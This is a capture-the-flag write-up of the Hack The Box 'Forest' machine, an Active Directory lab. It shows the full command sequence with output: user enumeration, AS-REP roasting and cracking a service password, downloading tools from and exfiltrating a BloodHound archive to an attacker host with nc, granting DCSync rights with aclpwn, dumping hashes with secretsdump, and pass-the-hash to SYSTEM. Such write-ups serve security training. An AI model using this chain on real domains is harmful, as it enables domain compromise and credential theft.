HTB: Forest

Details

This machine is Forest from Hack The Box

Recon

Started with a service discovery scan

root@kali:~# nmap -sV -p- 10.10.10.161
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 13:43 EDT
Nmap scan report for 10.10.10.161
Host is up (0.035s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-18 17:48:02Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc        Microsoft Windows RPC
49678/tcp open  msrpc        Microsoft Windows RPC
49700/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=10/18%Time=5DA9F9F6%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 164.23 seconds

So this is probably a kerberos box, it looks like a DC

User

root@kali:~# enum4linux -a 10.10.10.161
[SNIP]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
[SNIP]

I tried to request hashes for these, after putting htb.local in my hosts

root@kali:~# ./GetNPUsers.py htb.local/ -request
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet      LastLogon            UAC
------------  ------------------------------------------------------  -------------------  -------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2019-10-18 14:30:43  2019-09-23 07:09:47  0x410200

[email protected]:22a48b82c43ec0a2be44c7b9376d918b$fcfd507038ae594290de80b7f7fad5b2bc5ccdc94a4c81e8dc032d5c0a9f94423cfb1546ed098285d3c54e0cdf2c265797b18e60115c544c8d8deceff148e73268c049a9d9f855f75272618dc22b0b66ac5130b7228a9382c51716d5cf29b79587b36bd62a78635cd0329ff4a3f713d70a2cad84f429f3332806a18459b57e2996aaaf6fa218a84a4f6b9c655c53bb396b9800b25700ae9214014187adb42912c1b87e381993a9bbc4023759b6b82e8e13843814acc9ee37c4e2db3ad8999bbc7a6c857562a3ff7c6d1a4d9f75a6eadb5a531652d7c64d71a3474a0e4d69aef03f1efc577d52

Threw the hash into a file called crack.txt and set john on it

root@kali:~#  john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ([email protected])
1g 0:00:00:03 DONE (2019-10-18 14:30) 0.2577g/s 1053Kp/s 1053Kc/s 1053KC/s s4553592..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So creds of

svc-alfresco:s3rvice

Using evil-winrm I got a shell

root@kali:~# ./evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice

Info: Starting Evil-WinRM shell v1.7

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

And grabbed user

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..\Desktop

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

    Directory: C:\Users\svc-alfresco\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/23/2019   2:16 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
[REDACTED]

System

So as it was an AD box, I moved onto bloodhound, serving sharphound up on a simplehttpserver

*Evil-WinRM* PS C:\tmp> Invoke-WebRequest -URI http://10.10.14.25/SharpHound.ps1 -OutFile C:\tmp\SharpHound.ps1

With sharphound in place I ran it

*Evil-WinRM* PS C:\tmp> cmd /r powershell -Command "Import-Module .\SharpHound.ps1 ; Invoke-BloodHound -CollectionMethod All -IgnoreLdapCert -LDAPUser svc-alfresco -LDAPPass s3rvice"
Initializing BloodHound at 12:25 PM on 10/18/2019
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Starting Enumeration for htb.local
Status: 123 objects enumerated (+123 ì/s --- Using 90 MB RAM )
Finished enumeration for htb.local in 00:00:00.8645160
1 hosts failed ping. 0 hosts timedout.

Compressing data to C:\tmp\20191018122525_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!

I moved nc.exe over to the target so I could use it to extract this file

*Evil-WinRM* PS C:\tmp> Invoke-WebRequest -URI http://10.10.14.25/nc.exe -OutFile C:\tmp\nc.exe

root@kali:~# nc -nlvp 4444 > bloodhound.zip

*Evil-WinRM* PS C:\tmp> cmd /r ".\nc.exe 10.10.14.25 4444 < C:\tmp\20191018122525_BloodHound.zip"

I then loaded the file into bloodhound and searched for shortest route to DA

Screenshot 1

So this mapped out a nice route to DA for me, and I found a nice python tool for automating the exploit https://github.com/fox-it/aclpwn.py, the idea was it would give me the ability to carry out a DC sync and dump the secrets from the box

root@kali:~# python aclpwn.py -f "[email protected]" -ft user -t "htb.local" -tt domain -d htb.local
Please supply the password or LM:NTLM hashes of the account you are escalating from:
[!] Unsupported operation: GetChanges on HTB.LOCAL (Domain)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 1
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE WINDOWS [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20191020-124550.restore

Now I can use secretsdump to grab the hashes from the DC

secretsdump.py htb/svc-alfresco:[email protected] -just-dc
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[SNIP]

The part I needed was

aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Using that I can pass the hash with psexec to get a shell

psexec.py [email protected] -hashes "aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6"
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file IhMgjsGw.exe
[*] Opening SVCManager on htb.local.....
[*] Creating service PThP on htb.local.....
[*] Starting service PThP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

A new shell

C:\Windows\system32>whoami
nt authority\system

Flag time

C:\Windows\system32>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is E8B0-D68E

 Directory of C:\Users\Administrator\Desktop

09/23/2019  02:15 PM    <DIR>          .
09/23/2019  02:15 PM    <DIR>          ..
09/23/2019  02:15 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  31,136,137,216 bytes free

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.